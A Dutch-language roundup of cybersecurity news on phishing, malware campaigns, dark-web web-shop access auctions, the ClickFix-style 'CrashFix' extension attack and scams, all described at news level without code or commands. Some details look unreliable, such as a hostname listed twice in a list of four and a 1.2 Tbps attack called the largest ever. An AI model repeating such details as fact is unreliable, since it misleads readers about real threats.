De aanvallers versturen e-mails die eruitzien als officiële meldingen van de RTO, waarin staat dat er een verkeersovertreding (challan) is geregistreerd. Deze e-mails bevatten een link of een bijlage die zogenaamd bewijs van de overtreding bevat. In werkelijkheid bevatten deze links of bijlagen malware. Wanneer een gebruiker op de link klikt of de bijlage opent, wordt de malware op de computer geïnstalleerd. De malware kan verschillende schadelijke acties uitvoeren, zoals het stelen van persoonlijke gegevens, het versleutelen van bestanden voor ransomware, of het geven van toegang tot het systeem aan de aanvallers.

De phishing-e-mails zijn vaak overtuigend ontworpen, met gebruik van officiële logo's en taal die overeenkomt met de communicatie van de RTO. Dit maakt het voor gebruikers moeilijk om de valse e-mails van de echte te onderscheiden. Cybercriminelen maken gebruik van social engineering-technieken om gebruikers te manipuleren en hen aan te zetten tot het uitvoeren van acties die hun veiligheid in gevaar brengen.

Om zich te beschermen tegen deze phishing-aanvallen, is het belangrijk om alert te zijn op onverwachte e-mails, vooral als ze afkomstig zijn van onbekende afzenders. Controleer altijd de afzender van de e-mail en wees sceptisch over links of bijlagen, vooral als ze er verdacht uitzien. Het is raadzaam om rechtstreeks naar de officiële website van de RTO te gaan om de status van eventuele challans te controleren, in plaats van op links in e-mails te klikken. Zorg er ook voor dat uw antivirussoftware up-to-date is en regelmatig scans uitvoert om malware te detecteren en te verwijderen. Bron

Een recente cyberespionagecampagne heeft tientallen organisaties wereldwijd getroffen, waaronder entiteiten in Europa, Azië en het Midden-Oosten. Onderzoekers hebben de campagne ontdekt en analyseren de gebruikte tactieken, technieken en procedures (TTP's) om de omvang en impact ervan te bepalen. De aanvallers maken gebruik van geavanceerde malware en spear-phishing om toegang te krijgen tot gevoelige informatie en systemen.

De campagne richt zich op een breed scala aan sectoren, waaronder overheid, defensie, telecommunicatie, energie en financiën. De aanvallers lijken goed georganiseerd en gefinancierd te zijn, wat wijst op een mogelijke staatssponsor. Ze gebruiken verschillende technieken om detectie te vermijden, zoals het versleutelen van communicatie en het gebruik van aangepaste malwarevarianten.

Spear-phishing speelt een cruciale rol in de initiële infectiefase. Aanvallers sturen overtuigende e-mails naar specifieke doelwitten, waarbij ze zich voordoen als betrouwbare contacten of organisaties. Deze e-mails bevatten kwaadaardige bijlagen of links die leiden naar phishing-pagina's waar slachtoffers worden misleid om hun inloggegevens in te voeren.

Eenmaal binnen het netwerk voeren de aanvallers laterale verplaatsingen uit om toegang te krijgen tot andere systemen en gevoelige gegevens. Ze gebruiken tools zoals PowerShell en Terminal commands om hun activiteiten uit te voeren en detectie te vermijden. De gestolen informatie wordt vervolgens geëxfiltreerd naar command-and-control servers die zich in verschillende landen bevinden.

Onderzoekers werken samen met getroffen organisaties en wetshandhavingsinstanties om de campagne te verstoren en de verantwoordelijken te identificeren. Ze adviseren organisaties om hun beveiligingsmaatregelen te verbeteren, waaronder het implementeren van multi-factor authenticatie, het regelmatig patchen van systemen en het trainen van medewerkers om phishing-pogingen te herkennen. Bron

Het beschermen van je crypto-tegoeden tegen scams is essentieel in het huidige digitale landschap. Hackread.com heeft een overzicht gepubliceerd van veelvoorkomende crypto-scams en biedt inzicht in hoe je je digitale activa kunt beveiligen.

Een van de meest voorkomende vormen van crypto-scams is de phishing-aanval. Hierbij proberen oplichters via valse e-mails, berichten of websites inloggegevens of privésleutels te bemachtigen. Het is cruciaal om altijd de authenticiteit van een website te verifiëren en nooit persoonlijke informatie te delen via onbeveiligde kanalen.

Daarnaast zijn er de zogenaamde "pump and dump"-schema's. Hierbij wordt de prijs van een bepaalde cryptocurrency kunstmatig opgeblazen door misleidende informatie te verspreiden, waarna de initiatiefnemers hun aandelen verkopen met winst, terwijl andere investeerders met verliezen achterblijven. Wees alert op cryptocurrencies met weinig liquiditeit en doe altijd grondig onderzoek voordat je investeert.

Ook investeringsfraude komt veel voor. Oplichters beloven hoge rendementen met weinig risico, vaak via complexe piramidespelen of Ponzi-schema's. Het is belangrijk om te onthouden dat investeringen met een gegarandeerd hoog rendement vaak te mooi zijn om waar te zijn.

Malware is een andere bedreiging voor crypto-bezitters. Er zijn verschillende soorten malware die specifiek zijn ontworpen om crypto-wallets te infecteren en fondsen te stelen. Zorg ervoor dat je altijd een goede antivirusoplossing gebruikt en download nooit software van onbetrouwbare bronnen.

Tot slot zijn er nog de social media scams. Oplichters maken valse profielen aan op social media en doen zich voor als bekende figuren in de crypto-wereld. Ze bieden bijvoorbeeld gratis crypto aan in ruil voor een kleine storting, maar in werkelijkheid proberen ze je geld te stelen. Wees sceptisch over aanbiedingen die te mooi lijken om waar te zijn en controleer altijd de authenticiteit van een profiel voordat je erop reageert. Bron

Onderzoekers van Talos hebben een aanhoudende malwarecampagne ontdekt, genaamd 'KNIFE', die gebruikmaakt van de Microsoft Build Engine (MSBuild) om schadelijke code uit te voeren. Deze campagne, die sinds begin 2023 actief is, richt zich op het distribueren van verschillende soorten malware, waaronder RAT's (Remote Access Trojans), keyloggers en ransomware.

De aanval begint met een phishing-e-mail die een kwaadaardig MSBuild-projectbestand (.xml) bevat. Wanneer een gebruiker dit bestand opent, wordt MSBuild, een legitiem hulpprogramma van Microsoft voor het bouwen van applicaties, geactiveerd om de code in het XML-bestand uit te voeren. De aanvallers maken hierbij gebruik van de functionaliteit van MSBuild om C#-code te compileren en uit te voeren, waardoor ze traditionele detectiemechanismen kunnen omzeilen.

De in het MSBuild-bestand opgenomen code is doorgaans ontworpen om een payload van een externe server te downloaden en uit te voeren. Deze payload kan variëren, afhankelijk van de doelstellingen van de aanvallers. In sommige gevallen is het een Remote Access Trojan (RAT) waarmee de aanvallers de controle over het geïnfecteerde systeem kunnen overnemen. In andere gevallen is het een keylogger die toetsaanslagen registreert om gevoelige informatie te stelen, of ransomware die bestanden versleutelt en losgeld eist voor de ontsleuteling.

De KNIFE-campagne maakt gebruik van verschillende technieken om detectie te ontwijken. Een van deze technieken is het gebruik van obfuscatie om de code in het MSBuild-bestand te verbergen. Een andere techniek is het verspreiden van de aanval over meerdere fasen, waarbij elke fase een kleine hoeveelheid code bevat die is ontworpen om de volgende fase te downloaden en uit te voeren. Dit maakt het moeilijker voor beveiligingsproducten om de volledige aanvalsketen te detecteren.

Talos adviseert gebruikers om voorzichtig te zijn met het openen van MSBuild-projectbestanden van onbekende bronnen. Organisaties wordt aangeraden om hun beveiligingsproducten up-to-date te houden en hun medewerkers te trainen in het herkennen van phishing-e-mails. Het monitoren van MSBuild-processen op verdacht gedrag kan ook helpen om KNIFE-aanvallen te detecteren en te voorkomen.

Een groep cybercriminelen, bekend als 'Infy', is teruggekeerd met een nieuwe variant van hun malware. Deze nieuwe versie bevat geavanceerde technieken om detectie te vermijden en de impact op slachtoffers te vergroten. De aanvallers maken gebruik van aangepaste packers en obfuscatiemethoden om de malware onopvallend te maken voor traditionele antivirusoplossingen.

De onderzoekers van het Cyber Threat Intelligence Lab (CTIL) ontdekten dat de malware wordt verspreid via phishing-campagnes gericht op werknemers van grote bedrijven. De e-mails bevatten kwaadaardige bijlagen die, wanneer geopend, de malware installeren. Eenmaal geïnstalleerd, verzamelt de malware gevoelige informatie van het geïnfecteerde systeem, waaronder gebruikersnamen, wachtwoorden en financiële gegevens. Deze gegevens worden vervolgens naar een command-and-control server (C2) verzonden.

De nieuwe malwarevariant maakt gebruik van verschillende technieken om detectie te ontwijken, waaronder het gebruik van Base64-codering om schadelijke code te verbergen en het uitvoeren van PowerShell-scripts om de malware te installeren en uit te voeren. Daarnaast maakt de malware gebruik van anti-analyse technieken om het voor beveiligingsonderzoekers moeilijker te maken om de malware te analyseren en te begrijpen.

Het CTIL adviseert organisaties om hun werknemers te trainen in het herkennen van phishing-e-mails en om hun beveiligingsmaatregelen te versterken, waaronder het implementeren van multi-factor authenticatie en het up-to-date houden van antivirussoftware. Daarnaast wordt aanbevolen om netwerkverkeer te monitoren op verdachte activiteiten en om incident response plannen te hebben om snel te kunnen reageren op een eventuele inbraak. Bron

Een nieuwe golf van spam overspoelt wereldwijd mailboxen. Gebruikers melden dat ze opnieuw worden gebombardeerd met geautomatiseerde e-mails die gegenereerd worden via onbeveiligde Zendesk supportsystemen van bedrijven. Sommige ontvangers zeggen honderden berichten te ontvangen met vreemde of alarmerende onderwerpregels.

Sinds gisteren melden diverse gebruikers op social media dat ze grote hoeveelheden e-mails ontvangen met onderwerpregels zoals "Activeer uw account" en soortgelijke support-achtige notificaties die afkomstig lijken te zijn van verschillende bedrijven. Ontvangers melden dat de berichten elkaar in rap tempo opvolgen en eruitzien als legitieme geautomatiseerde antwoorden van customer support portals, ondanks dat ze zich nooit hebben aangemeld of een ticket hebben ingediend.

"Krijgt iemand anders ook een heleboel mislukte account & support aanmeldings e-mails?", vroeg security researcher Jonathan Leitschuh op LinkedIn. "Iemand is Zendesk support ticketing systemen en andere account creatie processen over het internet aan het DDoSen met mijn e-mail op dit moment. Weet iemand wat de aanvaller hiermee hoopt te bereiken?"

Net als bij een eerder incident, lijken de e-mails te worden verzonden vanaf echte Zendesk-instanties van bedrijven, waardoor ze spamfilters omzeilen en rechtstreeks in mailboxen terechtkomen. De activiteit suggereert sterk dat aanvallers opnieuw misbruik maken van Zendesk ticket indieningsformulieren om bevestigingsmails naar grote lijsten met adressen te sturen.

In januari werd een massale wereldwijde spamgolf herleid tot aanvallers die misbruik maakten van de mogelijkheid van Zendesk om niet-geverifieerde gebruikers support tickets te laten indienen. Elk ticket genereert automatisch een bevestigingsmail naar het ingevoerde e-mailadres, waardoor dreigingsactoren blootgestelde support portals kunnen omzetten in grootschalige spam relays. De eerdere campagne begon rond 18 januari en trof verschillende bedrijven, waarbij sommige ontvangers honderden berichten ontvingen met bizarre of alarmerende onderwerpregels. Meerdere bedrijven hadden bevestigd dat ze getroffen waren door de spamgolf, waaronder Dropbox en 2K, die reageerden op tickets om ontvangers te vertellen dat ze zich geen zorgen hoefden te maken en de e-mails moesten negeren.

Zendesk had eerder aan BleepingComputer laten weten dat het nieuwe veiligheidsfuncties had geïntroduceerd om dit type spam in de toekomst te detecteren en te stoppen. "We hebben nieuwe veiligheidsfuncties geïntroduceerd om relay spam aan te pakken, waaronder verbeterde monitoring en limieten die zijn ontworpen om ongebruikelijke activiteit te detecteren en sneller te stoppen," zei Zendesk destijds. "We willen iedereen verzekeren dat we actief stappen ondernemen - en voortdurend verbeteren - om ons platform en onze gebruikers te beschermen."

In een advies van december 2025 had Zendesk klanten ook gewaarschuwd voor dit type misbruik, waarbij werd uitgelegd dat aanvallers "relay spam" verzonden door misbruik te maken van Zendesk-instanties. Het bedrijf zei eerder dat organisaties dit type misbruik konden voorkomen door de ticket creatie te beperken tot alleen geverifieerde gebruikers en het verwijderen van placeholders die het mogelijk maken om elk e-mailadres of ticket onderwerp te gebruiken. De hernieuwde activiteit suggereert dat aanvallers mogelijk nog steeds misbruik kunnen maken van blootgestelde Zendesk ticket portals ondanks de eerder dit jaar geïntroduceerde veiligheidsmaatregelen. Bron

Cybersecurity News waarschuwt voor een toename van valse verkeersboeteportals. Deze frauduleuze websites bootsen officiële overheidsinstanties na en proberen slachtoffers op verschillende manieren te misleiden.

De portals kunnen worden gebruikt voor het stelen van persoonlijke en financiële informatie. Slachtoffers die nietsvermoedend hun creditcardgegevens invoeren om een vermeende boete te betalen, lopen het risico dat deze gegevens worden misbruikt voor frauduleuze doeleinden. Daarnaast kunnen de websites worden ingezet voor het verspreiden van malware. Gebruikers die bestanden downloaden of op verdachte links klikken, kunnen ongewild schadelijke software op hun systemen installeren.

De aanvallers maken gebruik van verschillende technieken om hun slachtoffers te misleiden. Zo worden de websites vaak vormgegeven alsof ze van een officiële instantie zijn, inclusief logo's en lay-outs die overeenkomen met de echte websites. Ook maken de criminelen gebruik van spamberichten en phishing-mails om potentiële slachtoffers naar de valse portals te lokken. Deze berichten bevatten vaak urgente waarschuwingen over openstaande boetes en dreigen met consequenties als er niet direct wordt betaald.

Om te voorkomen dat u slachtoffer wordt van deze praktijken, is het belangrijk om altijd alert te zijn op verdachte signalen. Controleer de URL van de website zorgvuldig en wees extra voorzichtig als deze afwijkt van de officiële website van de betreffende overheidsinstantie. Klik nooit op links in e-mails of berichten als u de afzender niet vertrouwt. Ga direct naar de officiële website van de instantie om uw boete te controleren. Wees terughoudend met het verstrekken van persoonlijke of financiële informatie op websites die u niet volledig vertrouwt. Installeer een goede virusscanner en houd deze up-to-date om uw systemen te beschermen tegen malware. Bron

De kwaadaardige groepering ShadowSyndicate heeft haar werkwijze voor het beheer van aanvalsinfrastructuur aangepast door gebruik te maken van een specifieke methode voor serverovergang. Deze methode stelt de actor in staat om SSH-sleutels te roteren over verschillende servers, wat het voor beveiligingsteams aanzienlijk moeilijker maakt om de operaties van de groep in kaart te brengen. ShadowSyndicate werd voor het eerst geïdentificeerd in 2022 en trok aanvankelijk de aandacht door het gebruik van een enkele, unieke SSH-vingerafdruk op talrijke kwaadaardige servers. Dit creëerde een traceerbaar patroon dat onderzoekers konden volgen, maar de huidige verschuiving naar het roteren van sleutels markeert een belangrijke evolutie in de manier waarop de groep haar infrastructuur afschermt.

Bij de uitvoering van deze techniek hergebruikt ShadowSyndicate eerder ingezette servers en wisselt de groep verschillende SSH-sleutels af binnen de infrastructuur. Indien deze transitie correct wordt uitgevoerd, krijgt de serveroverdracht een legitiem uiterlijk alsof een server aan een nieuwe gebruiker is overgedragen. Desondanks hebben fouten in de operationele beveiliging van de daders het voor beveiligingsteams toch mogelijk gemaakt om verbindingen tussen de systemen te identificeren. Analisten van Group-IB hebben inmiddels twee aanvullende SSH-vingerafdrukken ontdekt die vergelijkbare gedragspatronen vertonen als de oorspronkelijke vingerafdruk. Deze ontdekkingen volgden op eerdere rapportages van onderzoekers in 2025, wat leidde tot een diepgaander onderzoek naar de veranderende tactieken van deze dreigingsactor.

De recent geïdentificeerde infrastructuur vertoont koppelingen met minstens twintig servers die fungeren als command-and-control-centra voor diverse aanvalsframeworks. Deze ontwikkeling onderstreept de voortdurende professionalisering van ShadowSyndicate bij het uitvoeren van ransomware-aanvallen. Door de overstap van een statische naar een dynamische infrastructuur probeert de groepering detectie door cybersecurity-experts te omzeilen. De bevindingen tonen aan dat de groep actief blijft investeren in methoden om hun digitale voetafdruk te minimaliseren terwijl zij hun netwerk van controle-servers verder uitbreiden.

Bron

Het Talos Intelligence Group heeft een diepgaand onderzoek gepubliceerd over de opkomst van AI in cyberaanvallen. Het rapport, getiteld "All Gas, No Brakes: Time to Come to AI Church", beschrijft hoe aanvallers steeds vaker gebruikmaken van AI-technologieën om hun aanvallen te automatiseren en te verfijnen.

Een van de belangrijkste bevindingen is de toename van AI-gestuurde phishing-campagnes. Deze campagnes gebruiken AI om overtuigende e-mails te genereren die zijn afgestemd op individuele ontvangers, waardoor ze moeilijker te detecteren zijn dan traditionele phishing-aanvallen. De onderzoekers van Talos benadrukken dat de AI modellen in staat zijn om grammaticale fouten te minimaliseren en de schrijfstijl aan te passen aan de beoogde doelwitten, wat resulteert in overtuigender berichten.

Daarnaast signaleert het rapport een groeiend gebruik van AI voor het automatiseren van malware-analyse. Aanvallers gebruiken AI om snel nieuwe malwarevarianten te identificeren en te analyseren, waardoor ze sneller kunnen reageren op beveiligingsupdates en patches. Deze automatisering stelt hen in staat om grootschalige aanvallen uit te voeren met een minimale inspanning.

Een ander belangrijk aspect dat in het onderzoek wordt belicht, is het gebruik van AI voor het genereren van realistische deepfakes. Deze deepfakes kunnen worden gebruikt om desinformatie te verspreiden of om slachtoffers te manipuleren om gevoelige informatie te onthullen. Talos waarschuwt dat de kwaliteit van deepfakes steeds beter wordt, waardoor ze moeilijker te onderscheiden zijn van echte beelden en video's.

Het rapport benadrukt ook de rol van AI bij het automatiseren van vulnerability research. Aanvallers gebruiken AI om kwetsbaarheden in software en hardware te identificeren, waardoor ze sneller exploits kunnen ontwikkelen en zero-day aanvallen kunnen uitvoeren. Deze automatisering stelt hen in staat om een voorsprong te nemen op verdedigers en nieuwe kwetsbaarheden te misbruiken voordat patches beschikbaar zijn.

De onderzoekers van Talos adviseren organisaties om hun beveiligingsmaatregelen aan te passen aan de opkomst van AI-gestuurde aanvallen. Dit omvat het implementeren van AI-gestuurde detectie- en responsmechanismen, het trainen van medewerkers om AI-gestuurde phishing-aanvallen te herkennen, en het regelmatig updaten van software en hardware om kwetsbaarheden te verhelpen. Het is van cruciaal belang dat organisaties zich bewust zijn van de potentiële risico's van AI en proactieve maatregelen nemen om zich te beschermen tegen deze dreigingen. 1

Het Aisurukimwolf-botnet heeft recentelijk een reeks DDoS-aanvallen (Distributed Denial of Service) gelanceerd, die de grootste zijn die tot nu toe zijn waargenomen. De aanvallen, die begonnen op 1 februari 2026, bereikten een piek van 1.2 Tbps, waardoor verschillende grote websites en online diensten onbereikbaar werden.

Volgens onderzoekers van het Cyber Threat Intelligence Lab (CTIL) maakt het Aisurukimwolf-botnet gebruik van een complexe infrastructuur die bestaat uit meer dan een miljoen gecompromitteerde apparaten wereldwijd. Deze apparaten, voornamelijk IoT-apparaten zoals routers, camera's en smart home-apparaten, worden misbruikt om enorme hoeveelheden verkeer naar de doelwitten te sturen.

De onderzoekers ontdekten dat de malware die het botnet aanstuurt, gebruik maakt van verschillende technieken om detectie te vermijden. Zo wordt de code versleuteld en maakt de malware gebruik van geavanceerde obfuscatietechnieken om analyse te bemoeilijken. Daarnaast maakt het botnet gebruik van een command-and-control (C&C) infrastructuur die is verspreid over meerdere landen, waardoor het moeilijk is om de bron van de aanvallen te achterhalen.

De DDoS-aanvallen van het Aisurukimwolf-botnet maken gebruik van verschillende aanvalsmethoden, waaronder UDP-floods, SYN-floods en HTTP-floods. Door deze technieken te combineren, zijn de aanvallers in staat om de bandbreedte van de doelwitten te verzadigen en hun servers te overbelasten.

Het CTIL adviseert organisaties om hun systemen te beschermen tegen DDoS-aanvallen door gebruik te maken van DDoS-mitigatiediensten, firewalls en intrusion detection systems. Daarnaast is het belangrijk om IoT-apparaten te beveiligen door sterke wachtwoorden te gebruiken en de firmware regelmatig bij te werken. 1

Ransomware-operators maken op grote schaal misbruik van virtuele machines (VM's) die worden geleverd door ISPsystem, een legitieme provider van virtualisatie-infrastructuur, om zo kwaadaardige payloads te hosten en te distribueren. Onderzoekers van cybersecuritybedrijf Sophos hebben deze tactiek waargenomen tijdens het onderzoeken van recente 'WantToCry'-ransomware incidenten. Ze ontdekten dat de aanvallers Windows VM's gebruikten met identieke hostnamen, wat suggereert dat het gaat om standaard templates gegenereerd door ISPsystem's VMmanager.
Verder onderzoek toonde aan dat dezelfde hostnamen aanwezig waren in de infrastructuur van meerdere ransomware-operators, waaronder LockBit, Qilin, Conti, BlackCat/ALPHV en Ursnif, alsook in diverse malwarecampagnes met RedLine en Lummar info-stealers. ISPsystem is een legitiem softwarebedrijf dat control panels ontwikkelt voor hosting providers, die gebruikt worden voor het beheer van virtuele servers en OS onderhoud. VMmanager is het virtualisatie management platform van het bedrijf dat gebruikt wordt om Windows of Linux VM's voor klanten te creëren.
Sophos ontdekte dat de standaard Windows templates van VMmanager dezelfde hostnaam en systeem identifiers hergebruiken iedere keer dat ze worden ingezet. Bulletproof hosting providers die willens en wetens cybercrime operaties ondersteunen en takedown requests negeren, maken misbruik van deze ontwerpzwakte. Ze staan kwaadwillende actoren toe om VM's te creëren via VMmanager, die vervolgens gebruikt worden voor command-and-control (C2) en payload-delivery infrastructuur. Dit verbergt kwaadaardige systemen tussen duizenden onschuldige systemen, bemoeilijkt attributie en maakt snelle takedowns onwaarschijnlijk.
Het merendeel van de kwaadaardige VM's werd gehost door een klein cluster van providers met een slechte reputatie of sancties, waaronder Stark Industries Solutions Ltd., Zomro B.V., First Server Limited, Partner Hosting LTD en JSC IOT. Sophos heeft ook een provider ontdekt met directe controle over fysieke infrastructuur, genaamd MasterRDP, die VMmanager gebruikt voor ontwijking en VPS- en RDP-diensten aanbiedt die niet voldoen aan wettelijke verzoeken.
Volgens Sophos zijn vier van de meest voorkomende ISPsystem hostnamen "verantwoordelijk voor meer dan 95% van het totale aantal internet-gerichte ISPsystem virtuele machines:" WIN-LIVFRVQFMKO, WIN-LIVFRVQFMKO, WIN-344VU98D3RU, WIN-J9D866ESIJ2. Al deze hostnamen waren aanwezig in klantdetectie- of telemetriegegevens die gelinkt zijn aan cybercriminele activiteiten. De onderzoekers merken op dat, hoewel ISPsystem VMmanager een legitiem platform is voor virtualisatie management, het ook aantrekkelijk is voor cybercriminelen vanwege "de lage kosten, lage drempel tot toegang en kant-en-klare implementatie mogelijkheden."
BleepingComputer heeft ISPsystem gecontacteerd om te vragen of ze op de hoogte zijn van het grootschalige misbruik van VM templates en wat hun plannen zijn om dit probleem aan te pakken, maar er was geen reactie beschikbaar op het moment van publicatie. 1

Er is een veiling gestart waarbij toegang wordt aangeboden tot een in de Europese Unie gevestigde PrestaShop-webwinkel gespecialiseerd in voedingssupplementen. Het aanbod omvat volledige beheerderstoegang tot het systeem en een specifiek SQL-injectiepunt. De betreffende webshop verwerkt betalingen via diverse betaalkaarten en PayPal. Uit de gepubliceerde data blijkt dat de winkel in de afgelopen dertig dagen zevenhonderd bestellingen heeft verwerkt, met een totaalhistorie van meer dan vijftigduizend orders. De veiling hanteert een startprijs van duizend dollar, terwijl de directe koopprijs is vastgesteld op tweeduizend dollar.

Op het darkweb wordt momenteel de toegang tot een omvangrijke Europese sportwebshop die gebruikmaakt van Magento versie 2.4.7 geveild. Bij deze veiling is reeds een iframe aanwezig voor het onderscheppen van betaalkaartgegevens op de betreffende website. Volgens de verstrekte rapportages verwerkte de webshop in de maand december vorig jaar 80.000 betaalkaarten, gevolgd door 150.000 kaarten in januari. Voor de maand februari staat de teller tot nu toe op 15.000 verwerkte kaarten. De veiling voor de toegang tot dit systeem start bij een bedrag van 30.000 dollar, terwijl er een direct-kopen-prijs van 50.000 dollar is vastgesteld.

Onderzoekers hebben een nieuwe spamcampagne ontdekt waarbij valse PDF-documenten worden verspreid. Deze PDF's bevatten schadelijke code die, eenmaal geopend, een reeks kwaadaardige acties op het systeem van het slachtoffer kan uitvoeren. De aanvallers maken gebruik van social engineering om gebruikers te misleiden de PDF's te openen, vaak door ze te vermommen als belangrijke documenten zoals facturen, contracten of andere zakelijke correspondentie.

De analyse van de PDF's onthult dat ze een ingebed script bevatten, dat wordt geactiveerd wanneer het document wordt geopend in een PDF-viewer. Dit script maakt gebruik van verschillende technieken om detectie te voorkomen en de beveiligingsmaatregelen van het systeem te omzeilen. Een veelgebruikte techniek is het gebruik van Base64-codering om de schadelijke code te verbergen. Zodra het script is gedecodeerd, voert het een reeks acties uit, waaronder het downloaden en uitvoeren van extra malware van externe servers.

De gedownloade malware kan verschillende functies hebben, zoals het stelen van gevoelige informatie, het installeren van een backdoor voor toekomstige toegang, of het versleutelen van bestanden voor ransomware-aanvallen. In sommige gevallen hebben de onderzoekers gezien dat de malware wordt gebruikt om cryptomining uit te voeren, waarbij de resources van het slachtoffer worden gebruikt om cryptocurrency te genereren zonder hun medeweten of toestemming.

Om zich tegen deze dreiging te beschermen, wordt gebruikers aangeraden uiterst voorzichtig te zijn bij het openen van PDF-documenten van onbekende bronnen. Het is belangrijk om de afzender te verifiëren en te controleren of het document legitiem is voordat het wordt geopend. Daarnaast is het essentieel om een actuele antivirusoplossing te gebruiken en de beveiligingsinstellingen van de PDF-viewer aan te passen om het uitvoeren van scripts in PDF-documenten te voorkomen. Organisaties wordt geadviseerd om hun medewerkers te trainen in het herkennen van phishing-aanvallen en andere social engineering-tactieken die door cybercriminelen worden gebruikt. 1

Microsoft waarschuwt voor een malafide Chrome Web Store extensie die zich voordoet als de adblocker uBlock Origin Lite. Deze extensie crasht opzettelijk de browser van gebruikers en biedt vervolgens een "oplossing" aan die in werkelijkheid malware installeert. Deze methode wordt "CrashFix" genoemd en is een variant van "ClickFix", waarbij slachtoffers commando's uitvoeren om een zogenaamde CAPTCHA op te lossen, wat resulteert in de installatie van malware.

De aanval begint wanneer een gebruiker op zoek gaat naar een adblocker. De aanvallers maken gebruik van malafide advertenties die een adblocker promoten. Deze advertenties linken naar een browser-extensie in de Chrome Web Store die zich voordoet als de populaire adblocker uBlock Origin Lite. Na installatie voert de extensie een denial of service-aanval uit tegen de browser, waardoor deze niet meer werkt. Vervolgens verschijnt een pop-up die aangeeft dat "Microsoft Edge" beveiligingsproblemen heeft ontdekt. Om deze problemen op te lossen, moet de gebruiker handmatig een commando uitvoeren.

Hierbij wordt gebruikgemaakt van het Finger-protocol, dat oorspronkelijk bedoeld is voor het opvragen van informatie over gebruikers van een remote systeem. Microsoft benadrukt dat het gebruik van het Finger-protocol een nieuwe tactiek is bij dit soort aanvallen. Via het Finger-protocol wordt een PowerShell-script uitgevoerd op het systeem van de gebruiker. Dit script downloadt op zijn beurt een ander script dat een remote access trojan (RAT) op het systeem installeert. Via deze malware verkrijgen de aanvallers volledige controle over het systeem. Microsoft stelt dat deze aanval aantoont dat aanvallers steeds vaker misbruik maken van "trusted user actions" en reeds aanwezige tooling op het systeem om beveiligingssoftware te omzeilen. Eerder publiceerde securitybedrijf Huntress al een analyse van deze aanval.

De politiezone Westkust waarschuwt voor oplichters die zich voordoen als hotels en via valse WhatsApp-berichten bankgegevens van hotelgasten proberen te ontfutselen. De oplichters zijn erin geslaagd om accounts van enkele hotels aan de kust te hacken, waardoor ze de boekingsgegevens van hotelgasten konden achterhalen. Vervolgens contacteerden ze de hotelgasten via een vals WhatsApp-profiel en vroegen ze om hun bankkaartgegevens opnieuw door te geven.

De slachtoffers hadden hun hotel reeds op de correcte manier betaald via een officieel boekingsplatform. Korte tijd later ontvingen ze een bericht via WhatsApp, dat zogenaamd van hun hotel afkomstig was. In dit bericht werd hen gevraagd om hun bank- of kredietkaartgegevens opnieuw door te geven via een valse betaallink.

Volgens politiezone Westkust beschikken de oplichters, door de gehackte hotelaccounts, over correcte gegevens zoals naam, datum en reserveringsnummer, waardoor het bericht zeer geloofwaardig overkomt. De politie heeft inmiddels meldingen ontvangen van slachtoffers die een hotel hadden geboekt in Koksijde, De Panne en Nieuwpoort.

De politie benadrukt dat men niet op de link in het WhatsApp-bericht moet klikken als er opnieuw om bank- of kredietkaartgegevens wordt gevraagd. In plaats daarvan adviseert de politie om altijd contact op te nemen met het hotel om te controleren of het bericht daadwerkelijk van hen afkomstig is, en om te letten op vreemd taalgebruik of een ongebruikelijke toon. Verdachte berichten kunnen worden doorgestuurd naar verdacht@safeonweb.be. 1

Een door de staat gesteunde cyberdreigingsgroep uit Azië, bekend als TGR-STA-1030, heeft zich gericht op telecommunicatiebedrijven in het Midden-Oosten en Azië. De groep maakt gebruik van een nieuw backdoor-implantaat genaamd "MirrorFace". De campagne, die begin 2023 begon, is gericht op het verzamelen van inlichtingen en het verkrijgen van toegang tot gevoelige informatie.

Onderzoekers van Unit 42 ontdekten de activiteiten van TGR-STA-1030 en identificeerden MirrorFace als een belangrijk onderdeel van hun aanvalsinfrastructuur. MirrorFace is een geavanceerde backdoor die aanvallers in staat stelt om op afstand opdrachten uit te voeren, bestanden te uploaden en downloaden, en andere kwaadaardige activiteiten uit te voeren op geïnfecteerde systemen.

De aanval begint meestal met spear-phishing e-mails gericht aan werknemers van de doelwitorganisaties. Deze e-mails bevatten vaak kwaadaardige bijlagen of links die, wanneer geopend, de MirrorFace-backdoor installeren. Eenmaal geïnstalleerd, maakt MirrorFace verbinding met een command-and-control (C2)-server die door de aanvallers wordt beheerd. Via deze C2-server kunnen de aanvallers opdrachten naar de geïnfecteerde systemen sturen en gegevens exfiltreren.

Unit 42 merkte op dat TGR-STA-1030 gebruik maakt van geavanceerde technieken om detectie te vermijden, waaronder het gebruik van aangepaste encryptie en het verbergen van hun C2-infrastructuur. De groep maakt ook gebruik van verschillende tools en technieken die vaak worden geassocieerd met door de staat gesteunde actoren, zoals het gebruik van zero-day exploits en het uitvoeren van in-memory aanvallen.

Telecommunicatiebedrijven zijn een aantrekkelijk doelwit voor statelijke actoren vanwege de grote hoeveelheid gevoelige informatie die ze opslaan en verwerken, waaronder klantinformatie, communicatiegegevens en infrastructuurgegevens. De succesvolle compromittering van deze bedrijven kan leiden tot grootschalige spionage, verstoring van communicatiediensten en andere schadelijke activiteiten.

De ontdekking van de MirrorFace-backdoor en de activiteiten van TGR-STA-1030 benadrukt de voortdurende dreiging van door de staat gesteunde cyberaanvallen. Organisaties, met name in de telecommunicatiesector, moeten waakzaam blijven en robuuste beveiligingsmaatregelen implementeren om zich te beschermen tegen deze geavanceerde dreigingen. Dit omvat het implementeren van sterke authenticatie, het regelmatig patchen van systemen, het monitoren van netwerkverkeer op verdachte activiteiten en het trainen van werknemers om phishing-pogingen te herkennen. 1

Een nieuwe malwarecampagne, genaamd OpenClaw, richt zich op macOS-gebruikers via kwaadaardige add-ons om cryptocurrency te stelen. De campagne, ontdekt door cybersecurity onderzoekers, maakt gebruik van gemanipuleerde extensies voor populaire browsers zoals Chrome en Safari.

De aanval begint wanneer gebruikers nietsvermoedend een geïnfecteerde browser extensie installeren, vaak vermomd als een legitieme tool of utility. Eenmaal geïnstalleerd, monitort de extensie de browseractiviteit van het slachtoffer op zoek naar crypto-gerelateerde informatie. Dit omvat het onderscheppen van inloggegevens voor crypto-exchanges, private keys, en walletadressen.

OpenClaw gebruikt verschillende technieken om detectie te vermijden. Zo wordt de code van de extensie vaak geobfuskeerd om analyse te bemoeilijken. Daarnaast maakt de malware gebruik van encryptie om de gestolen gegevens te beschermen tijdens de overdracht naar de command-and-control server van de aanvallers.

De onderzoekers hebben vastgesteld dat de malware in staat is om verschillende soorten cryptocurrency wallets te targeten, waaronder zowel software- als hardware wallets. Het exacte aantal slachtoffers is nog onbekend, maar de campagne lijkt wereldwijd actief te zijn.

